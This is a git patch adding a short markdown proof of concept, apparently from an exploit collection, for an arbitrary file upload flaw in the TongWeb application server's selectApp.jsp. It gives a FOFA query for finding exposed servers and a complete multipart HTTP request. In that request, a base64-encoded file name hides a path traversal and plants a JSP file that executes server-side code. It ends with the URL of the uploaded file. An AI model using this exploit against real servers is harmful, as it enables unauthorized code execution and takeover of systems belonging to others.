From a331a133a29ed81519ead3ea698592a7ae14a5c3 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sun, 7 Apr 2024 18:40:32 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E4=B8=9C=E6=96=B9=E9=80=9ATongWeb-sel?=
 =?UTF-8?q?ectApp.jsp=E5=AD=98=E5=9C=A8=E4=BB=BB=E6=84=8F=E6=96=87?=
 =?UTF-8?q?=E4=BB=B6=E4=B8=8A=E4=BC=A0.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...��通TongWeb-selectApp.jsp存在任意文件上传.md | 35 +++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 东方通TongWeb-selectApp.jsp存在任意文件上传.md

diff --git a/东方通TongWeb-selectApp.jsp存在任意文件上传.md b/东方通TongWeb-selectApp.jsp存在任意文件上传.md
new file mode 100644
index 0000000..a595577
--- /dev/null
+++ b/东方通TongWeb-selectApp.jsp存在任意文件上传.md
@@ -0,0 +1,35 @@
+## 东方通TongWeb-selectApp.jsp存在任意文件上传
+
+## fofa
+```
+header="TongWeb Server" || banner="Server: TongWeb Server"
+```
+
+## poc
+```
+POST /heimdall/pages/cla/selectApp.jsp HTTP/1.1
+Host: 
+Content-Type: multipart/form-data; boundary=fa2ef860e94d564632e291131d20064c
+User-Agent: Mozilla/5.0 
+
+--fa2ef860e94d564632e291131d20064c
+Content-Disposition: form-data; name="app_fileName"
+
+Li4vLi4vYXBwbGljYXRpb25zL2hlaW1kYWxsLzEyM3F3ZTEuanNw
+--fa2ef860e94d564632e291131d20064c
+Content-Disposition: form-data; name="app"
+
+
+--fa2ef860e94d564632e291131d20064c
+Content-Disposition: form-data; name="className"
+
+test
+--fa2ef860e94d564632e291131d20064c
+Content-Disposition: form-data; name="uploadApp"; filename="test.jar"
+Content-Type: application/java-archive
+
+<% out.println(16156223+223415616); %>
+--fa2ef860e94d564632e291131d20064c--
+```
+
+文件上传路径：`http://ip/heimdall/123qwe1.jsp`